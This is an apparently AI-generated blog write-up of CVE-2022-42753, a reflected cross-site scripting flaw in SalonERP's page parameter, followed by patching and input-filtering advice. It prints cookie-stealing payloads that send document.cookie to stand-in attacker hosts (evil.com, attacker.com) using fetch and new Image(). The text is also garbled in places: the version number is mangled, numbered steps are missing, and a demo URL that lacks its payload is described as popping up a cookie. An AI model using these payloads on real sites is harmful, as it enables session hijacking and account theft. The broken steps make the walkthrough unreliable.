SalonERP is a management software used by salons and spas for handling appointments, customers, and finances. With the increasing digitalization, securing your clients’ data becomes critical. Unfortunately, in late 2022, a worrying vulnerability known as CVE-2022-42753 was discovered in its version 3..2, making user data susceptible to theft through a classic web security flaw: Cross-Site Scripting (XSS).
This post will break down how the vulnerability works, show you a simple proof-of-concept exploit, and suggest what you should do next.
What Is CVE-2022-42753?
SalonERP 3..2 fails to sanitize an important query parameter—specifically, the page parameter in the web URL. This means that an attacker can inject their own JavaScript code into the page. Because the application does not check or filter out this dangerous code, the browser will execute whatever the attacker sends. One common and dangerous use of XSS like this is stealing users’ cookies, which can allow attackers to hijack accounts.
Why Are Cookies Important?
Cookies often store session tokens, meaning if an attacker grabs your cookie, they can impersonate you without needing your password. This kind of attack is silent, fast, and effective.
How Does the Exploit Work?
When a user visits a manipulated link, the attacker’s script runs in the user’s browser. Here’s an example:
Suppose the “page” parameter is not checked. An attacker can craft a link like
http://victim-salon.com/index.php?page=<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>;
If a user with a valid session clicks this link, their browser will run the injected code, sending their cookies to the attacker's server.
1. Crafting the Exploit Link
http://salonerp.local/index.php?page=<script>new Image().src="http://attacker.com/?cookie="+document.cookie</script>;
*Note*: The attacker uses new Image() because it’s less suspicious and avoids CORS issues.
Let’s simulate what gets rendered
<!-- User clicks the malicious link -->
<html>
<body>
<script>
// This runs because the app does not filter the page parameter!
new Image().src="http://attacker.com/?cookie="+document.cookie;
</script>
</body>
</html>
This innocently sends the session cookie to attacker.com, allowing the attacker to reuse it.
Original Advisory and References
- NIST NVD Entry for CVE-2022-42753
- Exploit Database
- SalonERP Download and Info (for version context)
`
http://localhost/salon/index.php?page=
`
4. Result: The browser pops up with your cookie. An attacker could instead send this data elsewhere.
Update SalonERP: Patch as soon as a new version is available or request a fix from developers.
- Filter Inputs: Developers must sanitize and escape all untrusted user input (especially things sent in query parameters).
Closing Thoughts
CVE-2022-42753 is a classic—but devastating—XSS vulnerability. It proves that even popular business software can have simple, overlooked bugs with big security consequences. If you use SalonERP or similar web apps, always keep your software up to date, and urge your vendors to take security seriously.
Stay safe. Patch early. Don’t let your cookies crumble!
*Exclusive write-up by AI, built from public security advisories. If you see this vulnerability unpatched, contact the vendor and spread awareness.*
Timeline
Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 19:24:00 UTC